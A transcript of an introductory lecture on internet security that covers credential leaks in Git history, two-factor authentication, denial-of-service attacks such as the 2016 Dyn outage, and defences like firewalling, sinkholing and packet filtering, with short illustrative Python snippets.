DOUG LLOYD: Now that we know a bit more
about the internet and how it works,
let's reintroduce the subject of
security with this new context.
And let's start by talking
about Git and GitHub.
Recall that Git and GitHub are technologies used by programmers to version control their software, which basically gives them the ability to save code to an internet-based repository--so in case of some failure locally, they have a backup place to put it--but also to keep track of all the changes they've made and possibly go back in time in case they produce a version of code that is broken.
GitHub has some great
advantages, but it also
has the potential disadvantages
because of this structure
of being able to go back in time.
So for example, imagine that what we have is an initial commit--and a commit is just Git parlance for a set of code that you are sending to the internet.
So I've decided to take file A, file B,
and file C in their current versions.
I've saved them using control S or
command S literally on my machine,
and I want to send those
versions to GitHub to be
stored permanently or semi-permanently.
You would package those up in what's called a commit and then push that code to GitHub, where it would then be visible online.
And all the files that we view on
GitHub are tracked in terms of commits.
And commits chain together.
And we've seen this idea of
chaining in the past when we've
discussed linked lists, for example.
So every commit records the one that came before it, which means that once a commit is pushed, all of the commits that preceded it can be traced back through the chain.
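That chain can be sketched like a linked list, with each commit holding a reference to its parent and a hash derived from it. This is a simplified toy model with made-up names, not Git's actual storage format:

```python
import hashlib

class Commit:
    """A toy commit: a message, file contents, and the hash of its parent."""
    def __init__(self, message, files, parent=None):
        self.message = message
        self.files = dict(files)            # filename -> contents
        self.parent = parent                # previous Commit, or None
        parent_hash = parent.hash if parent else ""
        payload = (parent_hash + message + repr(sorted(self.files.items()))).encode()
        self.hash = hashlib.sha1(payload).hexdigest()

def history(commit):
    """Walk backward through the chain, newest to oldest."""
    while commit is not None:
        yield commit.message
        commit = commit.parent

first = Commit("initial commit", {"a.py": "print('hi')"})
second = Commit("update a.py", {"a.py": "print('hello')"}, parent=first)
print(list(history(second)))    # ['update a.py', 'initial commit']
```

Because each hash folds in the parent's hash, the whole history is reachable (and tamper-evident) from the newest commit--which is exactly why a later "delete the credentials" commit doesn't erase earlier ones.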
So imagine we have an initial commit where we post some code, and then we make some more changes.
We perhaps update our
database in such a way
where when we post or push-- excuse
me-- our second commit to GitHub,
we accidentally expose
the database credentials.
So perhaps someone
inadvertently typed the password
for how to access the database into
some Python code that would then
be used to access that database.
That's not a good thing.
And maybe somebody quickly realized
it and said, you know what?
We need to get this off of GitHub.
It is a source repository.
It's available online.
And so they push a third commit to
GitHub that deletes those credentials.
It stores them somewhere else that's not
going to be saved on this repository.
But have we actually solved the problem?
And you can probably
imagine that the answer
is no, because we have this
idea of version control
where every past iteration
of all of these files
is stored still on GitHub such that, if
I needed to, I could go back in time.
So even though I attempted to solve the security crisis I just created for myself by introducing a new commit that removes the credentials from those files--such that, if I'm looking just at the most recent version of the files, I don't see them anymore--I still have the ability to go back in time, so this doesn't actually solve the problem.
See, one of the interesting
things about GitHub
is the model that is used for it.
At the very beginning
of GitHub's existence,
it relied pretty extensively on
this idea of you sign up for free,
you get a free account
for GitHub, and you
have a limited number of private
repositories, repositories that are not
publicly viewable or searchable, and
you could pay to have more of them
if you wanted to.
But the majority of your repositories, assuming you did not opt into a paid account, were public, which meant anybody on the internet could search them using GitHub's search tool, or could just look for something using even a regular search engine such as Google.
And if your GitHub repositories happened to match what that person searched--or specifically, within GitHub's search feature, if a user was looking for specific lines of code--anything in a public repository was available.
Now, GitHub has recently
changed to a model where
there are more private repo--
or there's a higher limit
on the number of private repositories
that somebody could have.
But this was part of GitHub's design to really encourage
developers and programmers to sort of
create this open source community where
anybody could view someone else's
code, and in GitHub parlance,
fork their code, which basically
means to take their entire repository
or collection of files and copy it
into their own GitHub repository
to perhaps make changes
or suggest changes,
pushing those back into the
code base with the idea being
that it would make the
entire community better.
A side effect, of
course, is that items get
revealed when we do so because of this
public repository setup we have here.
So GitHub is great in terms
of its ability for programmers
to refer to materials on the internet.
They don't have to rely on their
own local machines to store code.
It allows people to work
from multiple workstations,
similar to how Dropbox or
Google Drive, for example,
might allow you to access
files from different machines.
You don't have to be on a
specific machine to access a file,
as we used to have to do before
these cloud-based document storage
services existed.
And it encourages collaboration.
For example, if you and I were to
collaborate on a GitHub repository,
I could push changes to that
repository that you could then pull.
And we could then be working
off of the same code base again.
We sort of have this central repo--
central area where we share
our code with one another.
And we can each
individually make changes
and incorporate one another's
changes into the final products.
So we're always working off
of the same base of material.
The side effect, though,
again, is this material
is generally public unless you have
opted into a private repository where
you have specific
individuals who are logged
in with their GitHub
accounts who want to share.
So is there a way, though, to solve this problem of accidentally exposing our credentials in a public repository?
Of course, if we're in
a private repository,
this might not be as alarming.
It's still probably not something to be encouraged--having credentials for anything stored anywhere on the internet, whether public or private. It's a little riskier.
But is there a way to get rid of this or
to prevent this problem from happening?
And fortunately, there are a
number of different safeguards
specific to Git and
GitHub that we can use
to prevent the accidental leakage
of information, so to speak.
So for example, one way we can handle this is using a program or utility called git-secrets.
Git-secrets works by scanning for strings that match what's called a regular expression.
And a regular expression is computer science parlance for a pattern describing a particular form of string--say, a certain number of characters, a certain number of digit characters, maybe some punctuation marks. You can say, I'm looking for strings that match this pattern--all capital letters, all lowercase letters, this many numbers, this many punctuation marks, and so on--using this tool called a regular expression.
Git-secrets contains a list of these regular expressions and will warn you, when you are about to make a commit--when you're about to push code to GitHub to be stored in its online repository--that you have a string matching a pattern you asked to be warned about. So be sure, before you commit and push this code, that you actually intend to send it up to GitHub, because it may match a password string that you're trying to avoid exposing.
So that's an interesting tool
that can be used for that.
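The scanning idea can be sketched in a few lines of Python. The two patterns here are illustrative stand-ins for git-secrets' real prohibited list (the first resembles the shape of an AWS access key ID):

```python
import re

# Hypothetical patterns in the spirit of git-secrets' prohibited list.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),    # shaped like an AWS access key ID
    re.compile(r"password\s*=\s*['\"][^'\"]+['\"]", re.IGNORECASE),
]

def find_secrets(text):
    """Return all substrings that match any prohibited pattern."""
    hits = []
    for pattern in SECRET_PATTERNS:
        hits.extend(pattern.findall(text))
    return hits

code = 'db_password = "hunter2"  # oops\nkey = "AKIAABCDEFGHIJKLMNOP"'
print(find_secrets(code))   # -> ['AKIAABCDEFGHIJKLMNOP', 'password = "hunter2"']
```

The real tool runs this kind of scan automatically against what you're about to commit and refuses the commit if anything matches.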
You also want to consider
limiting third party app access.
GitHub accounts are actually very commonly used as a form of login for other services, for example.
So there's an open standard called OAuth which allows you to use, for example, your Facebook account or your Google account to log into other services.
Perhaps you've encountered this
in your own experience working
with different services on the internet.
Instead of creating a login for site X, you could use your Facebook or Google login or, in many instances as well, your GitHub login to do so.
When you do so, though, you are
allowing that third party application,
someone that's not GitHub, the ability
to use and access your GitHub identity
or credential.
And so you should be very careful with
not only GitHub but other services
as well, thinking about whether you
want that other service to have access
to your GitHub, or Facebook, or Google
account information to use it even just
for authentication.
It's a good idea to try and
limit how much third party app
access you're giving to other services.
Another tool is to use
something called a commit hook.
Now, commit hook is just a
fancy term for a short program
or set of instructions that executes
when a commit is pushed to GitHub.
So for example, many
of the course websites
that we use here at Harvard
for CS50 are GitHub-based,
which means that when we want to change
the content on the course website,
we update some HTML, or Python,
or JavaScript files, we push those
to GitHub, and that triggers a commit hook that copies those files onto our web server and runs some tests on them to make sure that there are no errors in them.
For example, if we wrote some JavaScript or Python that was broken--it had a bug in it--we'd rather not deploy that bug, so to speak.
We wouldn't want the
broken version of the code
to replace the currently
working website.
And so a commit hook can be used to do testing as well.
And then once all the
tests pass, we then
are able to activate those
files on the web server
and the changes have happened.
So we're using GitHub
to store the changes
that we want to make on our
site, the HTML, the Python,
the JavaScript changes
that we want to make.
And then we're using this commit
hook, a set of instructions,
to copy them over and actually
deploy those changes to the website
once we've verified that we
haven't made anything break.
You can also use commit hooks, for
example, to check for passwords
and have it warn you if you have
perhaps leaked a credential.
And then you can undo
that with a technique
that we'll see in just a moment.
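Hooks live as executable files in a repository's .git/hooks directory and can be written in any language, including Python. Here's a hedged sketch of the password-checking idea; the pattern and the demo diff are made up for illustration, not CS50's actual deployment hook:

```python
#!/usr/bin/env python3
"""Sketch of a pre-commit hook (would live at .git/hooks/pre-commit)."""
import re
import subprocess
import sys

# Illustrative pattern; a real hook would check many more.
PASSWORD_PATTERN = re.compile(r"password\s*=\s*['\"][^'\"]+['\"]", re.IGNORECASE)

def staged_diff() -> str:
    """The changes staged for commit, as unified-diff text."""
    return subprocess.run(["git", "diff", "--cached"],
                          capture_output=True, text=True).stdout

def find_leaks(diff_text: str) -> list:
    """Added lines (starting with '+') that look like credentials."""
    return [line for line in diff_text.splitlines()
            if line.startswith("+") and PASSWORD_PATTERN.search(line)]

# As a hook you would run: sys.exit(1 if find_leaks(staged_diff()) else 0)
# A nonzero exit status aborts the commit. Demo on a fabricated diff:
demo = '+db_password = "hunter2"\n+x = 1\n-old_line = 0'
print(find_leaks(demo))     # -> ['+db_password = "hunter2"']
```

The key mechanism is the exit status: Git refuses to complete the commit if the pre-commit hook exits nonzero, which is what lets the hook stop a leak before it ever reaches GitHub.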
Another thing that you can do when
using GitHub to protect or verify
your identity is to use an SSH key.
SSH keys are a special form of public-private key pair. In this case, though, the key pair is really not used for encryption. It's actually used for identification.
And so this idea of
digital signatures, which
you may recall from a few lectures
ago, comes back into play.
Whenever I use an SSH key to push my code to GitHub, I also effectively sign that exchange. And so before the commit gets posted to GitHub, GitHub verifies it by checking my public key
and verifying, using the mathematics
that we've seen in the past,
that, yes, only Doug could have sent this, because only Doug's public key will unscramble this set of zeros and ones that I received, which could only have been created by his private key.
These two things are
reciprocal of one another.
So we can use SSH keys
and digital signatures
as an identity verification
scheme as well for GitHub
as we might be able to for
mailing documents, or sending
documents, or something like that.
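A toy sketch of that sign-and-verify math, using deliberately tiny textbook RSA numbers--real keys are thousands of bits long and add padding, so this is illustrative only:

```python
import hashlib

# Toy RSA key pair with tiny primes (p=61, q=53) -- illustration only.
p, q = 61, 53
n = p * q                       # 3233, the public modulus
phi = (p - 1) * (q - 1)         # 3120
e = 17                          # public exponent
d = pow(e, -1, phi)             # private exponent: e*d ≡ 1 (mod phi)

def sign(message: bytes) -> int:
    """Scramble the message's hash with the PRIVATE key."""
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(h, d, n)

def verify(message: bytes, signature: int) -> bool:
    """Unscramble with only the PUBLIC key (e, n) and compare hashes."""
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(signature, e, n) == h

commit = b"second commit: update database code"
sig = sign(commit)
print(verify(commit, sig))              # True
print(verify(b"tampered commit", sig))  # almost certainly False (hash differs)
```

Only the private key can produce a signature that the matching public key unscrambles back to the right hash, which is the "reciprocal" relationship described above.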
Now, imagine we have posted
the credentials accidentally.
Is there a way to get rid of them?
GitHub does track our entire history.
But what if we do make a mistake?
Human beings are fallible.
And so there is a way to
actually eliminate the history.
And that is using a command called git rebase.
So let's go back to the illustration
we had a moment ago where
we have several different commits.
And I've added a fourth commit here
just for purposes of illustration.
So our first commit
and our second commit,
and then it's after that that we
expose the credentials accidentally,
and then we have a fourth commit where
we actually delete that mistake that we
had previously made.
When we git rebase, the idea is we want to delete a portion of the history.
Now, deleting a portion of the history has a side effect. In this illustration, we're going to get rid of the last two commits, and any changes that I made in those commits besides accidentally exposing the credentials are also going to be destroyed.
And so it's going to be incumbent
on us to make sure to copy and save
the changes we actually want to preserve
in case we've done more than just
expose the credentials.
And then we'll have to make a
new commit in this new history
we create so that we can still preserve
those changes that we want to make.
But let's say, other
than the credentials,
I didn't actually do anything else.
One thing I could do is rebase--basically, set this second commit as the new end of the chain. So instead of the history going all the way out to the fourth commit and having that preserved ad infinitum, I want to just get rid of everything after the second commit.
And I can do that.
And then those commits are no longer remembered by GitHub. The next commit I make would go right after the second commit, as opposed to a fifth one right after the credentials were removed, and those commits are, for all intents and purposes on GitHub, forgotten. Keep in mind, though, that anyone who already pulled or cached the repository may still have the old history, so the safest move is still to change the exposed credentials themselves.
And finally, one more thing
that we can do when using GitHub
is to mandate the use of
two-factor authentication.
Recall we've discussed two-factor
authentication a little bit previously.
And the idea is that you
have a backup mechanism
to prevent unauthorized login.
And the two factors in
two-factor authentication
are not two passwords, because those
are fundamentally quite similar.
The idea is that you want to have
something that you know, for example,
a password-- that's usually very
commonly one of the two factors
in two-factor authentication--
and something that you
have, the thought being
that an adversary is incredibly unlikely
to have both things at the same time.
They may know your
password, but they probably
don't have your cell phone,
for example, or your RSA key.
They may have stolen your phone or
they may have stolen your RSA key,
but they probably don't
also know your password.
And so the idea is that this provides
an additional level of defense
against potential hacking,
or breaking into accounts,
or unauthorized behavior in
accounts that you obviously
don't want to happen.
Now, an RSA key, if you're unfamiliar,
is something that looks like this.
There's different versions of them.
They've sort of evolved over time.
This one is actually a
combined RSA key and USB drive.
And inside the window here of the RSA key is a six-digit number that changes every 60 seconds or so.
So when you are given one
of these, for example,
perhaps at a firm or a business,
it is assigned to you specifically.
There's a server that your IT team will have set up that maps the serial number on the back of this RSA key to your employee ID, for example.
But they otherwise don't know what the
number currently on the RSA key is.
They only know who owns it--who is physically in possession of it--and which employee ID it maps to.
And every 60 seconds
it changes according
to some mathematical algorithm that
is built into the key that generates
numbers in a pseudo random way.
And after 60 seconds, that code
will change into something else.
And you'll need to actually have
the key on you to complete a login.
If an RSA key is being used to secure a login such that you need to enter a password and your RSA key's value, you would need to have both.
No other employee's RSA key--well, hypothetically, I guess there's a one-in-a-million chance that another key would happen to be randomly showing the same number at the same time.
But no other employee's RSA
key could be used to log in.
Only yours could be used to log in.
Now, there are several
different tools out there
that can be used to provide
two-factor authentication services.
And there's really no technical
reason not to use these services.
You'll find them as applications
on cell phones, most likely.
And you'll find ones like this, Google
Authenticator, Authy, Duo Mobile.
There are lots of others.
And if you don't want to use one
of those applications specifically,
many services also just allow
you to receive a text message
from the service itself.
And you'll just get that
via SMS on your phone,
so still on your phone, just not
tied to a specific application.
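Authenticator apps like these implement the open TOTP standard (RFC 6238), which derives a code from a shared secret and the current time window; it layers a time counter on HOTP (RFC 4226). RSA SecurID hardware uses its own proprietary algorithm, but the idea is the same. A minimal sketch:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """One-time code from a shared secret and a counter (RFC 4226)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                  # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, period: int = 30) -> str:
    """Code derived from the current time window (RFC 6238)."""
    return hotp(secret, int(time.time()) // period)

# RFC 4226's published test secret; counter 1 yields "287082".
print(hotp(b"12345678901234567890", 1))
```

The server holds the same secret and recomputes the code for the current window, so a stolen password alone isn't enough: the adversary would also need whatever device holds the secret.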
And while there's no technical reason
to avoid two-factor authentication,
there is sort of this
social friction surrounding
two-factor authentication in that human
beings tend to find it annoying, right?
It used to be username,
password, you're logged in.
It's pretty quick.
Now it's username, password, you
get brought to another screen,
you're asked to enter a six-digit code,
or maybe in some advanced applications
you get a push notification sent to
your device that you have to unlock
and then hit OK on the device.
And people just find that inconvenient.
We haven't yet reached
this point culturally
where two-factor
authentication is the norm.
And so this is sort of a linchpin when we talk about security in the internet context: human beings are the limiting factor for how secure we can be.
We have the technology to take
steps to protect ourselves,
but we don't feel compelled to do so.
And we'll see this pattern reemerge
in a few other places today.
But just know that that
is why perhaps you're
not seeing so much adoption
of two-factor authentication.
It's not that it's technically
infeasible to do so.
It's just that we just
find it annoying to do so,
and so we don't adopt it as
aggressively as perhaps we should.
Now let's discuss the
type of attack that
occurs on the internet with
unfortunate regularity,
and that is the idea of a
denial of service attack.
Now, the idea behind
these attacks is basically
to cripple the
infrastructure of a website.
Now, the reason for this might be financial--you want to try and sabotage somebody. There might be other motivations. Distraction, for example: by tying up the victim's resources in trying to stop the attack, it opens up another avenue to do something else, to perhaps steal information.
There's many different
motivations for why they do this.
And some of them are
honestly just boredom or fun.
Amateur hackers sometimes
think it's fun to just initiate
a denial of service attack
against an entity that
is not prepared to handle it.
Now, in the associated
materials for this course,
we provided an article called Making
Cyberspace Safe for Democracy, which
we really do encourage you
to take a look at, read,
and discuss with your group.
But I also want to take a
little bit of time right
now just to talk about
this article in particular
and draw your attention
to some areas of concern
or some areas that might
lead to more discussion.
Now, the biggest of these is that these attacks tend not to be taken very seriously by people when they hear about them.
You'll occasionally hear about
these attacks in the news,
denial of service
attacks, or their cousin,
distributed denial of service attacks.
But culturally, again,
us being humans and sort
of neglecting some of the
real security concerns here,
we don't think of it as an attack.
And that's maybe because of how we
hear about other kinds of attacks
on the news that seem more
physically devastating,
that have more real consequences.
And it makes it hard to have a serious
conversation about cyber attacks
because there's this friction that we
face trying to get people to understand
that these are meaningful and real.
And in particular, these
attacks are kind of insidious.
They're really easy to execute
without much difficulty at all,
especially against a small business
that might be running its own server as
opposed to relying on a cloud service.
A pretty top-of-the-line, commercially
available machine might be able
to execute a denial of service
or DoS attack on its own.
It doesn't even require
exceptional resources.
Now, when we start to attack mid-sized
companies, or larger companies
or entities, one single computer
from one single IP address
is not typically going to be enough.
And so instead, you would have a
distributed denial of service attack.
In a distributed denial
of service attack,
there is still generally one core
hacker, or one collective group
of hackers or adversaries
that are trying
to penetrate some company's defenses.
But they can't do it
with their own machine.
And so what they do is create
something called a botnet.
Perhaps you've heard this term before.
A botnet basically is created when hackers or adversaries distribute worms or viruses surreptitiously--perhaps packaged into some download. People don't notice anything about the worm, this program that has been covertly installed on their machine.
It doesn't do anything in
particular until it is activated.
And then it becomes
an agent or a zombie--
sometimes you'll hear
it termed that as well--
controlled by the hackers.
And so all of a sudden
the adversaries gain
control of many different
devices, hundreds or thousands
or tens of thousands, or even
more in some of the bigger attacks
that have happened--basically rendering all of these computers under their control and being able to direct them to take whatever action they want.
And in particular, in the case of a
distributed denial of service attack,
all of these computers are
going to make web requests
to the same server or same
website. That's the idea: whether it's a distributed denial of service attack or just a regular denial of service attack--really it's just a question of scale--we're hitting those servers with so many web requests. I want to access this, I want to access this--hundreds, thousands, tens of thousands of these requests a second--such that the server can't possibly field all of these inquiries that are coming in and give these requests the data they're asking for.
Ultimately, that would
eventually, after enough time,
result in the server just crashing,
throwing up its hands and saying,
I don't know what to do.
I can't possibly process
all of these requests.
But by tying it up in
this way, the adversary
has succeeded in damaging the
infrastructure of the server.
It's either denied the server
the ability to process customers
and payments or it's just
taken down the entire website
so there's no information available
about the company anymore to anybody
who's trying to look it up.
These attacks are actually
really, really common.
There are some surveys out that assess that roughly one sixth to one third of the average-sized businesses that are part of this tech survey that goes out every year suffer some sort of DoS attack in a given year--so 17% to 33% or so of businesses, which is a lot of businesses when you think about it.
And these attacks are
usually quite small,
and they're certainly not newsworthy.
They might last a few minutes.
They might last a few hours.
But they're enough to be disruptive.
They're certainly noteworthy.
And they're something to
avoid if it's possible.
Cloud computing has made
this problem kind of worse.
And the reason for this is that,
in a cloud computing context,
your server that is
running your business
is not physically
located on your premises.
It was often the case that when
a business would run a website
or would run their business, they
would have a server room that
had the software that was
necessary to run their website
or to run whatever software-based
services they provided.
And it was all local to that business.
No one else could possibly be affected.
But in a cloud computing
context, we are generally
renting server space and server power
from an entity such as Amazon Web
Services, or Google Cloud Services,
or some other large provider where
it might be that 10, 20, 50, depending
on the size of the business in question
here--
multiple businesses are sharing
the same physical resources,
and they're sharing
the same server space,
such that if any one
of those 50, let's say,
businesses is targeted
by hackers or adversaries
for a denial of service attack, that
might actually, as collateral damage,
take out the other 49 businesses.
They weren't even part of the attack.
But cloud computing--we've heard about it as a great thing. It allows us to scale out our websites, making it so that we can handle more customers. It takes away part of the problem of web-based security, because we're outsourcing that to the cloud provider.
But it now introduces this new problem
of, if we're all sharing the resources
and any one of us gets
attacked, then all of us
lose the ability to access
those resources and use them,
which might cause all of
our organizations to suffer
the consequences of one single attack.
This collateral damage can get even worse when you think about businesses whose service is providing the internet itself, OK?
So a very common example of this--or a noteworthy example of this--happened in 2016 with a service called Dyn, D-Y-N. Dyn is a DNS service provider, DNS being the domain name system.
And the idea there is to map names like www.google.com to their IP addresses.
Because in order to actually
access anything on the internet
or to have a communication with anyone,
you need to know their IP address.
And as human beings, we tend
not to actually remember
what some website's IP address is, much
like we may not recall a certain phone
number.
But if it has a mnemonic
attached to it-- so for example,
you know back in the day we had
1-800-COLLECT for collect calls.
If you forgot the number, the
literal digits of that phone number,
you could still remember the idea of
it because you had this mnemonic device
to help remind you.
Domain names, www.whatever.com,
are just mnemonic devices
that we use to refer to an IP address.
And DNS servers provide
this service to us.
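You can see this name-to-address mapping yourself with a single call to the operating system's resolver. A minimal Python sketch (the address returned for a real site varies by network and time, so the demo uses localhost):

```python
import socket

# Ask the system's DNS resolver to turn a name into an IPv4 address.
print(socket.gethostbyname("localhost"))        # typically 127.0.0.1

# For a real site (answer varies by where and when you ask):
# print(socket.gethostbyname("www.google.com"))
```

Every browser does this lookup behind the scenes before it can open a connection, which is why taking out a DNS provider takes so much else down with it.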
Dyn is one of the major DNS providers for the internet overall.
And if a denial of service attack--or in this case certainly a distributed denial of service attack, because it was enormous--hits that server over and over and over, then it is unable to field requests from anyone else, because it's just getting pummeled by all of these requests from some botnet that some adversary or collective of adversaries has taken control of.
The collateral damage here is that no one can map a domain name to an IP address, which means no one can visit any of these websites unless they happened to know at the outset what the IP address of a given website was.
If you knew the IP address, this wasn't a problem. You could still go directly to that IP address--that's not what this attack targeted. The attack instead tied up the ability to translate these mnemonic names into numbers.
And as you can see, Dyn was--or is--a DNS provider for much of the eastern half of the United States as well as the Pacific Northwest and California.
And if you think about
what kinds of businesses
are headquartered in
the Pacific Northwest
and in California and in the
New York area, for example,
you probably see that some major, major services were affected, including GitHub, which we've already talked about today, but also Facebook and others. Harvard University's website was also taken down for several hours.
This attack lasted about 10 hours, so it was quite prolonged. It really did a lot of damage that day--it crippled the ability of people to use the internet for a long period of time--so it's a very interesting case.
This article also talks a bit about how the United States government--or legislature--has decided to handle these kinds of issues, computer-based attacks. It takes a look at the Computer Fraud and Abuse Act, which is codified at 18 USC 1030.
And this is really the only general computer crimes law that is on the books, and it talks about what it means to be a protected computer.
And you'll be interested to know
perhaps that any computer pretty much is
a protected computer.
The law specifically calls out government computers as well as any computer that may be involved in interstate commerce--which, as you can imagine, means that anybody who uses the internet has a computer that falls under the ambit of this act.
So it's another interesting thing to take a look at if you're interested in how we deal with prosecuting computer-based crimes.
All of it is actually sort of dealt
with in the Computer Fraud and Abuse
Act, which is not terribly long
and hasn't been updated extensively
since the 1980s other than
some small amendments.
So it's kind of interesting that we have not yet gotten to the point where we are defining and prosecuting specific types of computer crime, even though we've begun to identify different types of computer crimes, such as DoS attacks, such as phishing, and so on.
Now, hypothetically, a simple
denial of service attack
should be pretty easy to stop.
And the reason for that is that there's only one machine making the attack. All web requests, recall, happen via HTTP, which is carried over TCP/IP. And the IP layer requires that the sender's IP address be part of the envelope that gets sent over, such that the server that wants to respond to the client, or sender, can just reference it. It's the return address. You need to be able to know where to send the data back to.
And so if you see thousands of requests coming from a single IP address, you can just decide, as the server, in software, to stop accepting requests from that address.
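That single-source defense can be sketched as a small request filter that counts requests per address and blocks an address once it crosses a threshold. The threshold and the addresses here are made up (they're from the reserved documentation ranges):

```python
from collections import defaultdict

class RequestFilter:
    """Block an IP address once it exceeds a request budget."""
    def __init__(self, max_requests=100):
        self.max_requests = max_requests
        self.counts = defaultdict(int)
        self.blocked = set()

    def allow(self, ip: str) -> bool:
        if ip in self.blocked:
            return False
        self.counts[ip] += 1
        if self.counts[ip] > self.max_requests:
            self.blocked.add(ip)     # stop accepting requests from this address
            return False
        return True

f = RequestFilter(max_requests=3)
print([f.allow("203.0.113.7") for _ in range(5)])   # [True, True, True, False, False]
print(f.allow("198.51.100.2"))                      # other clients unaffected: True
```

A real server would also expire the counts over time; the point is just that one misbehaving address is trivial to identify and cut off.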
DDoS attacks, distributed
denial of service attacks,
are much harder to stop.
And it's exactly because of the fact
that there is not a single source.
If there's a single source,
again, we would just completely
stop accepting any requests of
any type from that computer.
However, because we have so many
different computers to contend with,
the options to handle this
are a bit more limited.
There are some techniques for
averting them or stopping them
once they are detected, however,
the first of which is firewalling.
So the idea of a firewall
is we are only going
to allow requests of a certain type.
We're going to allow
them from any IP address,
but we're only going to
accept them into this port.
Recall that TCP/IP gives us the ability to say this service comes in via this port--so HTTP requests come in via port 80, and HTTPS requests come in via port 443.
So imagine a distributed
denial of service attack
where typically the site would expect
to be receiving requests on HTTPS.
It generally only uses
secured HTTP in order
to process whatever
requests are coming in.
So it's expecting to receive
a lot of traffic on port 443.
And then all of a sudden a
distributed denial of service attack
begins and it's receiving
lots of requests on port 80.
One way to stop that attack before
it starts to tie up resources
is to just put a
firewall up and say, I'm
not actually going to accept
any requests on port 80.
And this may have a side effect of
denying certain legitimate requests
from getting through.
But since the vast majority of the
traffic that I receive on the site
comes in via HTTPS on port 443,
that's a small price to pay.
I'd rather just allow the
legitimate requests to come in.
So that's one technique.
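In practice this filtering is done with operating-system or appliance firewall rules rather than application code, but the decision being made reduces to something as simple as this hypothetical sketch:

```python
# Hypothetical port filter: accept only the ports our site actually serves.
ALLOWED_PORTS = {443}           # we expect HTTPS traffic only

def firewall_allows(port: int) -> bool:
    """Drop any incoming request that isn't aimed at an allowed port."""
    return port in ALLOWED_PORTS

print(firewall_allows(443))     # legitimate HTTPS request: allowed
print(firewall_allows(80))      # the flood arriving on port 80: dropped
```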
Another technique is
something called sinkholing.
And it's exactly what
you probably think it is.
So a sinkhole, as you probably know, is a hole in the ground that swallows everything up. And a sinkhole in a digital context is basically a big black hole for data.
It's just going to swallow
up every single request
and just not allow any of them out.
So this would, again, stop
the denial of service attack
because it's just
taking all the requests
and basically throwing
them in the trash.
This won't take down the website of
the company that's being attacked,
so that's a good thing.
But it's also not going to allow
any legitimate traffic of any type
through, so that might be a bad thing.
But depending on the
length of the attack, if it
seems like it's going to be
short, if the requests trickle off
and stop because the attackers
realize, we're not making any progress,
we're not actually doing--
we're not getting the results
that we had hoped for,
then perhaps they would give up.
Then the sinkhole could be
stopped and regular traffic
could start to flow through again.
So a sinkhole is basically just
take all the traffic that comes in
and just throw it in the trash.
And then finally, another
technique we could use
is something called packet analysis.
So again, HTTP, we know, is how requests are made via the web.
And we learned a little
bit that we have headers
that are packaged alongside
those HTTP packets
where the request originated
from, where it's going to.
There's a whole lot of
other metadata as well.
You'll know, for example, what type
of browser the individual is using
and what operating system
perhaps they are using
and where, as in sort of a
geographical generalization, are they.
Are they in the US Northeast?
Are they in South America and so on?
Instead of deciding to restrict
traffic via specific ports
or just restrict all traffic, we could
still allow all traffic to come in
but inspect all of the
packets as they come in.
So for example, perhaps most
of the traffic on our site we
are expecting to come from the--
just because I used
that example already--
US Northeast.
And then all of a sudden
we are experiencing
tons of packets coming in that have IP
addresses that all seem to be based--
or they have, as part of
their packets, information
that says that they're
from South America,
or they're from the US West Coast, or
somewhere else that we don't expect.
We can decide, after taking
a quick look at that packet
and analyzing those individual
headers, that I'm not
going to accept any
packets from that location.
The ones that match locations
I'm expecting, I'll let through.
And this, again, might prevent certain legitimate customers, who might actually be based in South America, from getting through.
But in general, it's going to
block most of the damaging traffic.
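That packet-analysis filter can also be sketched as simple decision logic. The header dictionary and the region values here are illustrative; a real system would derive the region from the packet's source IP address via a GeoIP database rather than trusting any header.

```python
# Sketch of packet analysis: inspect request metadata and drop traffic
# from regions we don't expect to see. The "region" field is a stand-in
# for what a GeoIP lookup on the source IP would produce.

EXPECTED_REGIONS = {"US-Northeast"}

def accept_packet(headers):
    """Accept only packets whose inferred region matches expectations."""
    return headers.get("region") in EXPECTED_REGIONS

print(accept_packet({"region": "US-Northeast"}))   # True  -> let through
print(accept_packet({"region": "South America"}))  # False -> dropped
```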
DDoS attacks are really
frustrating for companies
because they really
can do a lot of damage.
Usually the resources of the company being attacked-- especially if they're cloud-based and can rely on their cloud provider to help them scale up-- are enough to eventually outlast and stop the attacker, who usually has a much more limited set of resources.
But again, depending on the type of
business being attacked in this way--
again, think of the example of Dyn, the DNS provider.
The ramifications for
one of these attacks
can be really quite severe and
really quite annoying and costly
for a business that suffers it.
So we just talked about HTTP and HTTPS a moment ago when we were talking about firewalling, allowing some traffic on some of the ports but not other ports, so maybe allowing HTTPS traffic but not HTTP traffic.
Let's take a look at these two
technologies in a bit more detail.
So HTTP, again, is the
hypertext transfer protocol.
It is how hypertext or web pages
are transmitted over the internet.
If I am a client and I make a
request to you for some HTML content,
then you as a server would
send a response back to me,
and then I would be able to see
the page that I had requested.
And every HTTP request has a specific
format at the beginning of it.
For example, we might see something like this: GET /execed HTTP/1.1, Host: law.harvard.edu.
Let's just quickly pick these
apart again one more time.
If you see GET at the
beginning of an HTTP request,
it means please fetch or get
for me, literally, this page.
The page I'm requesting
specifically is /execed.
And the host that I'm asking it from
is, in this case, law.harvard.edu.
So basically what I'm saying
here is please fetch for me,
or retrieve for me, the
HTML content that comprises
http://law.harvard.edu/execed.
And specifically I'm doing this
using HTTP protocol version 1.1.
We're still widely using version 1.1 even though it was defined more than 20 years ago, and a newer version 2.0 now exists.
And basically this is just
HTTP's way of identifying
how you're asking the question.
So it's similar to me making a
request and saying, oh, by the way,
the rest of this request is written
in French, or, oh, by the way,
the rest of this request
is written in Spanish.
It's more like here are
the parameters that you
should expect to see
because this request is
in version 1.1, which differed
non-trivially from version 1.0.
So it's just an identifier for how
exactly we are formatting our request.
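Since HTTP/1.1 is just line-oriented plain text, the request from the example can be written out literally and picked apart. This is the exact format a client sends over the wire: a request line, then headers, then a blank line.

```python
# The request from the lecture, as the literal text a client would send.
request = (
    "GET /execed HTTP/1.1\r\n"
    "Host: law.harvard.edu\r\n"
    "\r\n"
)

# Picking the request line apart into its three pieces:
method, path, version = request.splitlines()[0].split(" ")
print(method, path, version)  # GET /execed HTTP/1.1
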